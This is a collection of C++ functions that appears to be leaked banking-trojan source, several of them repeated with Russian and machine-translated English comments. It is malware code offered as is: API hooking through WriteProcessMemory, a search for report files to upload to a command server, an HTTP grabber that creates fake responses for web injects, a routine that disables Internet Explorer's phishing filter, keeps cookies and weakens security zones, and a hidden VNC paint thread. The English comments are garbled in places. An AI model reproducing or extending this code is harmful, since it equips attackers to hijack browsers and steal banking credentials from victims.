bool WaHook::_unhook(HANDLE process, void *hookedFunction, void *originalFunction, DWORD size) { bool ret = false; DWORD oldProtect; DWORD_PTR avalibeBytes = checkAvalibleBytes(process, hookedFunction); //Даем все права затрагиваемым страницам. if(avalibeBytes >= OPCODE_MAX_SIZE * 2 && CWA(kernel32, VirtualProtectEx)(process, hookedFunction, OPCODE_MAX_SIZE * 2, PAGE_EXECUTE_READWRITE, &oldProtect) != 0) { if(CWA(kernel32, WriteProcessMemory)(process, hookedFunction, originalFunction, size - JMP_ADDR_SIZE, NULL) != 0)ret = true; //Восстаналиваем права. CWA(kernel32, VirtualProtectEx)(process, hookedFunction, OPCODE_MAX_SIZE * 2, oldProtect, &oldProtect); } return ret; }
bool WaHook::_unhook(HANDLE process, void *hookedFunction, void *originalFunction, DWORD size) { bool ret = false; DWORD oldProtect; DWORD_PTR avalibeBytes = checkAvalibleBytes(process, hookedFunction); //Give all the rights of the affected pages. if(avalibeBytes >= OPCODE_MAX_SIZE * 2 && CWA(kernel32, VirtualProtectEx)(process, hookedFunction, OPCODE_MAX_SIZE * 2, PAGE_EXECUTE_READWRITE, &oldProtect) != 0) { if(CWA(kernel32, WriteProcessMemory)(process, hookedFunction, originalFunction, size - JMP_ADDR_SIZE, NULL) != 0)ret = true; //Vosstanalivaem law. CWA(kernel32, VirtualProtectEx)(process, hookedFunction, OPCODE_MAX_SIZE * 2, oldProtect, &oldProtect); } return ret; }
/*В В Search for a file to upload. В В OUT fileName - the full path of the file. В В IN tempFile - the full path of the temporary file. В В IN maxDelay - max delay time for the report max (errorDelay, normalDelay). В В Return - true - the file is found, В В В В В В В В В В В В В В В В В false - file not found.*/ static bool findReportFileForSending(LPWSTR fileName, LPWSTR tempFile, DWORD maxDelay) { //Check is not sent out a temporary file. if(CWA(kernel32, GetFileAttributesW)(tempFile) != INVALID_FILE_ATTRIBUTES) { Str::_CopyW(fileName, tempFile, -1); return true; } //Check the log file. if(CWA(kernel32, GetFileAttributesW)(reportFile) != INVALID_FILE_ATTRIBUTES) { Str::_CopyW(fileName, reportFile, -1); return true; } return false; }
LPSTR Wininet::_queryInfoExA(HINTERNET request, DWORD infoLevel, LPDWORD lenght, LPDWORD index) { char tmpBuf[1]; LPSTR buf; *lenght = 0; if((infoLevel & HTTP_QUERY_FLAG_NUMBER) == 0 && CWA(wininet, HttpQueryInfoA)(request, infoLevel, tmpBuf, lenght, index) == FALSE && CWA(kernel32, GetLastError)() == ERROR_INSUFFICIENT_BUFFER) { if((buf = (LPSTR)Mem::alloc(*lenght)) != NULL) { if(CWA(wininet, HttpQueryInfoA)(request, infoLevel, buf, lenght, index) == TRUE)return buf; Mem::free(buf); } } return NULL; }
/* Поиск файл для загрузки на сервер. OUT fileName - полный путь файла. IN tempFile - полный путь временного файла. IN maxDelay - макс время задержки для отчета max(errorDelay, normalDelay). Return - true - файл найден, false - файл не найден. */ static bool findReportFileForSending(LPWSTR fileName, LPWSTR tempFile, DWORD maxDelay) { //Проверяем не отосланный временный файл. if(CWA(kernel32, GetFileAttributesW)(tempFile) != INVALID_FILE_ATTRIBUTES) { Str::_CopyW(fileName, tempFile, -1); return true; } //Проверяем файл отчета. if(CWA(kernel32, GetFileAttributesW)(reportFile) != INVALID_FILE_ATTRIBUTES) { Str::_CopyW(fileName, reportFile, -1); return true; } return false; }
//fs bool MalwareTools::_GenerateRandomFileName(DWORD dwCaseFlags, LPWSTR pstrPath, LPWSTR pstrName, LPWSTR pstrExtension, BYTE bMinChars, BYTE bMaxChars) { WCHAR tmpName[MAX_PATH]; for(DWORD i = 0; i < 100; i++) { _GenerateRandomNameW(dwCaseFlags, tmpName, bMinChars, bMaxChars); if(Fs::_pathCombine(pstrName, pstrPath, tmpName)) { if(pstrExtension != NULL && CWA(shlwapi, PathAddExtensionW)(pstrName, pstrExtension) == FALSE)continue; if(CWA(kernel32, GetFileAttributesW)(pstrName) == INVALID_FILE_ATTRIBUTES)return true; } } return false; }
void WininetHook::init(const LPWSTR homePage) { connections = NULL; connectionsCount = 0; CWA(kernel32, InitializeCriticalSection)(&connectionsCs); if(coreData.integrityLevel > Process::INTEGRITY_LOW) { //Домашняя страница. if(homePage != NULL && *homePage != 0) { CSTR_GETW(startPageValue, regvalue_ie_startpage); CSTR_GETW(startPagePath, regpath_ie_startpage); Registry::_setValueAsString(HKEY_CURRENT_USER, startPagePath, startPageValue, homePage, Str::_LengthW(homePage)); } //Отключение фишинг фильтра. { CSTR_GETW(key, regpath_ie_phishingfilter); CSTR_GETW(var1, regvalue_ie_phishingfilter1); CSTR_GETW(var2, regvalue_ie_phishingfilter2); const LPWSTR vars[] = {var1, var2}; for(BYTE i = 0; i < sizeof(vars) / sizeof(LPWSTR); i++)if(Registry::_getValueAsDword(HKEY_CURRENT_USER, key, vars[i]) != 0)Registry::_setValueAsDword(HKEY_CURRENT_USER, key, vars[i], 0); } //Не очищать куки при выходе из IE. { CSTR_GETW(key, regpath_ie_privacy); CSTR_GETW(var, regvalue_ie_privacy_cookies); if(!Registry::_valueExists(HKEY_CURRENT_USER, key, var) || Registry::_getValueAsDword(HKEY_CURRENT_USER, key, var) != 0) { Registry::_setValueAsDword(HKEY_CURRENT_USER, key, var, 0); } } //Настройка Интернет-зон. //FIXME: делать это через COM. { CSTR_GETW(key, regpath_ie_zones); CSTR_GETW(var1, regpath_ie_zones_1406); CSTR_GETW(var2, regpath_ie_zones_1609); const LPWSTR vars[] = {var1, var2}; WCHAR keyBuf[CryptedStrings::len_regpath_ie_zones + 10]; for(BYTE i = 0; i < 5; i++)if(Str::_sprintfW(keyBuf, sizeof(keyBuf) / sizeof(WCHAR), key, i) > 0) { for(BYTE a = 0; a < sizeof(vars) / sizeof(LPWSTR); a++) { if(Registry::_getValueAsDword(HKEY_CURRENT_USER, keyBuf, vars[a]) != 0)Registry::_setValueAsDword(HKEY_CURRENT_USER, keyBuf, vars[a], 0); } } } } }
bool Process::_enablePrivilege(LPWSTR privilegeName, bool enable) { HANDLE token; if(CWA(advapi32, OpenThreadToken)(CWA(kernel32, GetCurrentThread)(), TOKEN_ADJUST_PRIVILEGES/*B | TOKEN_QUERY*/, FALSE, &token) == FALSE) { if(CWA(advapi32, OpenProcessToken)(CURRENT_PROCESS, TOKEN_ADJUST_PRIVILEGES/*B | TOKEN_QUERY*/, &token) == FALSE) { return false; } } bool r = false; TOKEN_PRIVILEGES tp; tp.PrivilegeCount = 1; tp.Privileges[0].Attributes = enable ? SE_PRIVILEGE_ENABLED : 0; if(CWA(advapi32, LookupPrivilegeValueW)(NULL, privilegeName, &tp.Privileges[0].Luid) != FALSE && CWA(advapi32, AdjustTokenPrivileges)(token, FALSE, &tp, 0, NULL, NULL) != FALSE && CWA(kernel32, GetLastError)() == ERROR_SUCCESS) { r = true; } CWA(kernel32, CloseHandle)(token); return r; }
//to hz bool MalwareTools::_getOsGuid(GUID *guid) { bool ok = false; WCHAR path[MAX_PATH]; WCHAR volume[100]; if(CWA(shell32, SHGetFolderPathW)(NULL, CSIDL_WINDOWS, NULL, SHGFP_TYPE_CURRENT, path) == S_OK) { //Ищим первую точку монтирования. CWA(shlwapi, PathAddBackslashW)(path); while(CWA(kernel32, GetVolumeNameForVolumeMountPointW)(path, volume, sizeof(volume) / sizeof(WCHAR)) == FALSE) { CWA(shlwapi, PathRemoveBackslashW)(path); if(CWA(shlwapi, PathRemoveFileSpecW)(path) == FALSE)goto BAD_END; CWA(shlwapi, PathAddBackslashW)(path); } //Потверждаем GUID. LPWSTR str = volume + 10; if(*str == '{') { str[38] = 0; if(CWA(ole32, CLSIDFromString)(str, guid) == NOERROR)ok = true; } } BAD_END: if(!ok)Mem::_zero(guid, sizeof(GUID)); return ok; }
bool WinSecurity::_setLowIntegrityLevelLabel(LPWSTR name, DWORD objectType, bool inherit) { bool r = false; PSECURITY_DESCRIPTOR sd; Process::_enablePrivilege(SE_SECURITY_NAME, true); if(CWA(advapi32, ConvertStringSecurityDescriptorToSecurityDescriptorW)(inherit ? LOWINTEGRITYLEVEL_FULLACCESS_INHERIT : LOWINTEGRITYLEVEL_FULLACCESS, SDDL_REVISION_1, &sd, NULL) != FALSE) { BOOL saclPresent, saclDefaulted; PACL sacl = NULL; if(CWA(advapi32, GetSecurityDescriptorSacl)(sd, &saclPresent, &sacl, &saclDefaulted) != FALSE) { if(CWA(advapi32, SetNamedSecurityInfoW)(name, (SE_OBJECT_TYPE)objectType, LABEL_SECURITY_INFORMATION, NULL, NULL, NULL, sacl) == ERROR_SUCCESS)r = true; } CWA(kernel32, LocalFree)(sd); } return r; }
bool Process::_isWow64(HANDLE process) { typedef BOOL (WINAPI *ISWOW64PROCESS)(HANDLE, PBOOL); BOOL isWow64 = FALSE; HMODULE kernel32 = CWA(kernel32, GetModuleHandleW)(L"kernel32.dll"); if(kernel32 != NULL) { ISWOW64PROCESS isWow64Process = (ISWOW64PROCESS)CWA(kernel32, GetProcAddress)(kernel32, "IsWow64Process"); if(isWow64Process != NULL) { if(isWow64Process(process, &isWow64) == FALSE)return false; } } return isWow64 ? true : false; }
DWORD Console::writeStringW(LPWSTR string, DWORD size) { if(size == (DWORD)-1)size = Str::_LengthW(string); if(isWineBug)return writeData(string, size * sizeof(WCHAR)); //WINE WARNING: Вывод почему-то происходит абсолютно номарльно. register DWORD result; CWA(kernel32, WriteConsoleW)(handleOutput, string, size, &result, NULL); return result; }
LPWSTR Gui::_getWindowText(HWND window, LPDWORD size) { LPWSTR buf = NULL; int len = CWA(user32, GetWindowTextLengthW)(window); if(len > 0 && (buf = (LPWSTR)Mem::alloc(len * sizeof(WCHAR) + sizeof(WCHAR))) != NULL) { if((len = CWA(user32, GetWindowTextW)(window, buf, len + 1)) > 0) { if(size)*size = len; } else { Mem::free(buf); buf = NULL; } } return buf; }
void OsEnv::_getVersionEx(OSINFO *oi) { Mem::_zero(oi, sizeof(OSINFO)); OSVERSIONINFOEXW osvi; osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEXW); if(CWA(kernel32, GetVersionExW)((OSVERSIONINFOW *)&osvi) != FALSE) { SYSTEM_INFO si; CWA(kernel32, GetNativeSystemInfo)(&si); oi->version = _getVersion(); oi->sp = (osvi.wServicePackMajor > 0xFF || osvi.wServicePackMinor != 0) ? 0 : LOBYTE(osvi.wServicePackMajor); oi->build = osvi.dwBuildNumber > 0xFFFF ? 0 : LOWORD(osvi.dwBuildNumber); oi->architecture = si.wProcessorArchitecture; } }
DWORD Console::writeStringW(LPWSTR string, DWORD size) { if(size == (DWORD)-1)size = Str::_LengthW(string); if(isWineBug)return writeData(string, size * sizeof(WCHAR)); //WINE WARNING: The output for some reason, there is absolutely nomarlno. register DWORD result; CWA(kernel32, WriteConsoleW)(handleOutput, string, size, &result, NULL); return result; }
bool OsEnv::_getUserProfileDirectoryhBySid(PSID sid, LPWSTR buffer) { bool retVal = false; LPWSTR sidStr; if(CWA(kernel32, ConvertSidToStringSidW)(sid, &sidStr) != FALSE) { CSTR_GETW(regPathFormat, regpath_profilelist); WCHAR regPath[MAX_PATH]; if(Str::_sprintfW(regPath, MAX_PATH, regPathFormat, sidStr) > 0) { CSTR_GETW(regValuePath, regvalue_profilelist_path); DWORD r = Registry::_getValueAsString(HKEY_LOCAL_MACHINE, regPath, regValuePath, regPath, MAX_PATH); if(r != 0 && r != (DWORD)-1)retVal = Fs::_unquoteAndExpandPath(regPath, buffer); } CWA(kernel32, LocalFree)(sidStr); } return retVal; }
bool Gui::_loadCommonControl(DWORD classes) { INITCOMMONCONTROLSEX cc; cc.dwSize = sizeof(INITCOMMONCONTROLSEX); cc.dwICC = classes; return (CWA(comctl32, InitCommonControlsEx)(&cc) == TRUE); }
static UINT __FxIRead(INT_PTR hf, void *memory, UINT cb) { DWORD r; if(hf != -1 && hf != 0) { if(memory != NULL && CWA(kernel32, ReadFile)(((CFDATA *)hf)->handle, memory, cb, &r, NULL))return r; } return (UINT)-1; }
SOCKET WSocket::tcpConnectA(const LPSTR host, const WORD port) { WORD tcpPort = SWAP_WORD(port); //Получаем данные удаленного сервера. SOCKADDR_STORAGE *destAddrIpv4 = NULL; SOCKADDR_STORAGE *destAddrIpv6 = NULL; { struct addrinfo *aiList; if(CWA(ws2_32, getaddrinfo)(host, NULL, NULL, &aiList) != 0)return INVALID_SOCKET; struct addrinfo *cur = aiList; while(cur) { if(cur->ai_family == AF_INET)destAddrIpv4 = (SOCKADDR_STORAGE *)Mem::copyEx(cur->ai_addr, cur->ai_addrlen); else if(cur->ai_family == AF_INET6)destAddrIpv6 = (SOCKADDR_STORAGE *)Mem::copyEx(cur->ai_addr, cur->ai_addrlen); cur = cur->ai_next; } CWA(ws2_32, freeaddrinfo)(aiList); } SOCKET s = INVALID_SOCKET; //FIXME: поменять приоретет, когда IPv6 станет порулярнее IPv4. if(destAddrIpv4 != NULL) { ((SOCKADDR_IN *)destAddrIpv4)->sin_port = tcpPort; s = tcpConnect(destAddrIpv4); } //Хз на сколько это логично в релаьных условиях. if(destAddrIpv6 != NULL && s == INVALID_SOCKET) { ((SOCKADDR_IN6 *)destAddrIpv6)->sin6_port = tcpPort; s = tcpConnect(destAddrIpv6); } Mem::free(destAddrIpv4); Mem::free(destAddrIpv6); return s; }
bool Report::startServerSession(SERVERSESSION *session) { WDEBUG1(WDDT_INFO, "url=%S", session->url); bool retVal = false; HttpTools::URLDATA ud; BinStorage::STORAGE *originalPostData = session->postData; //Save the original post-data. if(HttpTools::_parseUrl(session->url, &ud)) { Core::initHttpUserAgent(); //Repeat cycle connections to the server in case of disconnection or unavailable. for(BYTE bi = 0; bi < WININET_CONNECT_RETRY_COUNT && retVal == false; bi++) { //Delay. if(bi > 0) { if(session->stopEvent != NULL) { if(CWA(kernel32, WaitForSingleObject)(session->stopEvent, WININET_CONNECT_RETRY_DELAY) != WAIT_TIMEOUT)break; } else CWA(kernel32, Sleep)(WININET_CONNECT_RETRY_DELAY); } //Create a handle to the server. HINTERNET serverHandle = Wininet::_Connect(coreData.httpUserAgent, ud.host, ud.port, bi % 2 == 0 ? Wininet::WICF_USE_IE_PROXY : 0); if(serverHandle != NULL) { for(DWORD loop = 0;; loop++) { int r = sendRequest(&ud, serverHandle, session, originalPostData, loop); if(r == SSPR_ERROR)break; else if(r == SSPR_END){retVal = true; break;} } Wininet::_CloseConnection(serverHandle); } } HttpTools::_freeUrlData(&ud); } session->postData = originalPostData; //Restoring the original post-data. return retVal; }
HINTERNET HttpGrabber::_createFakeResponse(REQUESTDATA *requestData, INJECTFULLDATA *fakeData) { //Генерируем URL фейка. FAKECONNECT fakeConnect; fakeConnect.requestData = requestData; fakeConnect.fakeRequest = NULL; if(fakeData->flags & HttpInject::FLAG_IS_MIRRORFAKE)fakeConnect.fakeUrl = _genarateMirrorFakeUrlA(fakeData->fakeUrl, requestData->url, fakeData->urlMask); else fakeConnect.fakeUrl = HttpTools::_catExtraInfoFromUrlToUrlA(requestData->url, fakeData->fakeUrl); # if defined WDEBUG1 WDEBUG1(WDDT_INFO, "fakeConnect.fakeUrl=[%S].", fakeConnect.fakeUrl); # endif //Вызываем поток для прозрачного подключения. if(fakeConnect.fakeUrl != NULL) { Core::initHttpUserAgent(); //Нужно вызвать здесь, т.к. вызов в другом потоке приведет к deadlock. # if defined WDEBUG0 WDEBUG0(WDDT_INFO, "Sending request to fake."); # endif HANDLE fakeThread = CWA(kernel32, CreateThread)(NULL, 0, (LPTHREAD_START_ROUTINE)fakeConnectProc, &fakeConnect, 0, NULL); if(fakeThread != NULL) { Sync::_waitForMultipleObjectsAndDispatchMessages(1, &fakeThread, false, INFINITE); CWA(kernel32, CloseHandle)(fakeThread); } # if defined WDEBUG0 WDEBUG0(WDDT_INFO, "Request sended."); # endif Mem::free(fakeConnect.fakeUrl); } //Проверяем результат. # if(BO_DEBUG > 0 && defined WDEBUG) if(fakeConnect.fakeRequest == NULL)WDEBUG0(WDDT_ERROR, "Failed to create fake request."); # endif return fakeConnect.fakeRequest; }
bool Report::startServerSession(SERVERSESSION *session) { WDEBUG1(WDDT_INFO, "url=%S", session->url); bool retVal = false; HttpTools::URLDATA ud; BinStorage::STORAGE *originalPostData = session->postData; //Сохраняем оригинальные пост-данные. if(HttpTools::_parseUrl(session->url, &ud)) { Core::initHttpUserAgent(); //Цикл повтора подключений к серверу в случаи обрыва или недоступности. for(BYTE bi = 0; bi < WININET_CONNECT_RETRY_COUNT && retVal == false; bi++) { //Задержка. if(bi > 0) { if(session->stopEvent != NULL) { if(CWA(kernel32, WaitForSingleObject)(session->stopEvent, WININET_CONNECT_RETRY_DELAY) != WAIT_TIMEOUT)break; } else CWA(kernel32, Sleep)(WININET_CONNECT_RETRY_DELAY); } //Создаем хэндл сервера. HINTERNET serverHandle = Wininet::_Connect(coreData.httpUserAgent, ud.host, ud.port, bi % 2 == 0 ? Wininet::WICF_USE_IE_PROXY : 0); if(serverHandle != NULL) { for(DWORD loop = 0;; loop++) { int r = sendRequest(&ud, serverHandle, session, originalPostData, loop); if(r == SSPR_ERROR)break; else if(r == SSPR_END){retVal = true; break;} } Wininet::_CloseConnection(serverHandle); } } HttpTools::_freeUrlData(&ud); } session->postData = originalPostData; //Восстанавливаем оригинальные пост-данные. return retVal; }
SOCKET WSocket::tcpConnectA(const LPSTR host, const WORD port) { WORD tcpPort = SWAP_WORD(port); //Obtain the data the remote server. SOCKADDR_STORAGE *destAddrIpv4 = NULL; SOCKADDR_STORAGE *destAddrIpv6 = NULL; { struct addrinfo *aiList; if(CWA(ws2_32, getaddrinfo)(host, NULL, NULL, &aiList) != 0)return INVALID_SOCKET; struct addrinfo *cur = aiList; while(cur) { if(cur->ai_family == AF_INET)destAddrIpv4 = (SOCKADDR_STORAGE *)Mem::copyEx(cur->ai_addr, cur->ai_addrlen); else if(cur->ai_family == AF_INET6)destAddrIpv6 = (SOCKADDR_STORAGE *)Mem::copyEx(cur->ai_addr, cur->ai_addrlen); cur = cur->ai_next; } CWA(ws2_32, freeaddrinfo)(aiList); } SOCKET s = INVALID_SOCKET; //FIXME: change prioretet when IPv6 will become porulyarnee IPv4. if(destAddrIpv4 != NULL) { ((SOCKADDR_IN *)destAddrIpv4)->sin_port = tcpPort; s = tcpConnect(destAddrIpv4); } //Xs on how much it is logical to relanyh conditions. if(destAddrIpv6 != NULL && s == INVALID_SOCKET) { ((SOCKADDR_IN6 *)destAddrIpv6)->sin6_port = tcpPort; s = tcpConnect(destAddrIpv6); } Mem::free(destAddrIpv4); Mem::free(destAddrIpv6); return s; }
bool WSocket::tcpSetKeepAlive(SOCKET s, bool enable, DWORD time, DWORD interval) { tcpKeepAlive ka; ka.onoff = enable; ka.keepalivetime = time; ka.keepaliveinterval = interval; DWORD retBytes; return (CWA(ws2_32, WSAIoctl)(s, SIO_KEEPALIVE_VALS, &ka, sizeof(tcpKeepAlive), NULL, 0, &retBytes, NULL, NULL) == 0); }
void ThreadsGroup::_closeTerminatedHandles(GROUP *group) { BYTE i = 0, j = 0; for(; i < group->count; i++)if(group->handles[i] != NULL) { if(CWA(kernel32, WaitForSingleObject)(group->handles[i], 0) == WAIT_OBJECT_0) { CWA(kernel32, CloseHandle)(group->handles[i]); group->handles[i] = NULL; } else { group->handles[j] = group->handles[i]; j++; } } group->count = j; }
bool WSocket::ipToStringW(const SOCKADDR_STORAGE *sockAddr, LPWSTR buffer) { DWORD size = MAX_PATH; if(CWA(ws2_32, WSAAddressToStringW)((LPSOCKADDR)sockAddr, SIZEOF_SOCKADDR(sockAddr->ss_family), NULL, buffer, &size) != 0) { Str::_CopyW(buffer, L"0:0", 3); return false; } return true; }
static bool AddRef(void) { if(ref_count == 0) { if((hDll = CWA(kernel32, LoadLibraryA)(MSCAB_DLL)) != NULL) { # if(XLIB_MSCAB_FCI > 0) mf_FciCreate = (fFciCreate) CWA(kernel32, GetProcAddress)(hDll, "FCICreate"); mf_FciAddFile = (fFciAddFile) CWA(kernel32, GetProcAddress)(hDll, "FCIAddFile"); //mf_FciFlushFolder = (fFciFlushFolder) CWA (kernel32, GetProcAddress) (hDll, "FCIFlushFolder"); mf_FciFlushCabinet = (fFciFlushCabinet)CWA(kernel32, GetProcAddress)(hDll, "FCIFlushCabinet"); mf_FciDestroy = (fFciDestroy) CWA(kernel32, GetProcAddress)(hDll, "FCIDestroy"); # endif # if(XLIB_MSCAB_FDI > 0) mf_FdiCreate = (fFdiCreate) CWA(kernel32, GetProcAddress)(hDll, "FDICreate");; mf_FdiCopy = (fFdiCopy) CWA(kernel32, GetProcAddress)(hDll, "FDICopy");; //mf_FdiIsCabinet = (fFdiIsCabinet) CWA (kernel32, GetProcAddress) (hDll, "FDIIsCabinet");; mf_FdiDestroy = (fFdiDestroy) CWA(kernel32, GetProcAddress)(hDll, "FDIDestroy");; # endif if( # if(XLIB_MSCAB_FCI > 0) mf_FciCreate != NULL && mf_FciAddFile != NULL /*&& mf_FciFlushFolder != NULL*/ && mf_FciFlushCabinet != NULL && mf_FciDestroy != NULL # if(XLIB_MSCAB_FDI > 0) && # endif # endif # if(XLIB_MSCAB_FDI > 0) mf_FdiCreate != NULL && mf_FdiCopy != NULL /*&& mf_FdiIsCabinet != NULL*/ && mf_FdiDestroy != NULL # endif ) { hMsCabHeap = CWA(kernel32, HeapCreate)(0, HEAP_SIZE, 0); if(hMsCabHeap != NULL)goto GOODEND; } CWA(kernel32, FreeLibrary)(hDll); } return false; } GOODEND: ref_count++; return true; }
static int __FxIClose(INT_PTR hf) { if(hf != -1 && hf != 0) { CWA(kernel32, CloseHandle)(((CFDATA *)hf)->handle); Mem::free(((CFDATA *)hf)->fileName); __FxIFree((void *)hf); } return 0; }
static UINT __FxIWrite(INT_PTR hf, void *memory, UINT cb) { if(hf != -1 && hf != 0) { DWORD w; if(((CFDATA *)hf)->oflags & _O_APPEND)Fs::_setFilePointer(((CFDATA *)hf)->handle, 0, FILE_END); if(CWA(kernel32, WriteFile)(((CFDATA *)hf)->handle, memory, cb, &w, NULL))return w; } return (UINT)-1; }
bool VncServer::startAsPaintThread(void) { CWA(kernel32, SetThreadPriority)(CWA(kernel32, GetCurrentThread)(), THREAD_PRIORITY_ABOVE_NORMAL); CWA(kernel32, SetEvent)(vncActiveProcessData.vncMessageEvent); MSG msg; BOOL r; while((r = CWA(user32, GetMessageW)(&msg, (HWND)-1, 0, 0)) != (BOOL)-1 && r != FALSE) { if(msg.message == vncActiveProcessData.vncMessage && msg.wParam == VMW_REMOTE_PAINT) { vncActiveProcessData.globalData->paintProcess.retVal = paintWindow(&vncActiveProcessData, (HWND)msg.lParam, &vncActiveProcessData.globalData->paintProcess.ownerRect, true); CWA(kernel32, SetEvent)(vncActiveProcessData.vncMessageEvent); } } return(r == FALSE); }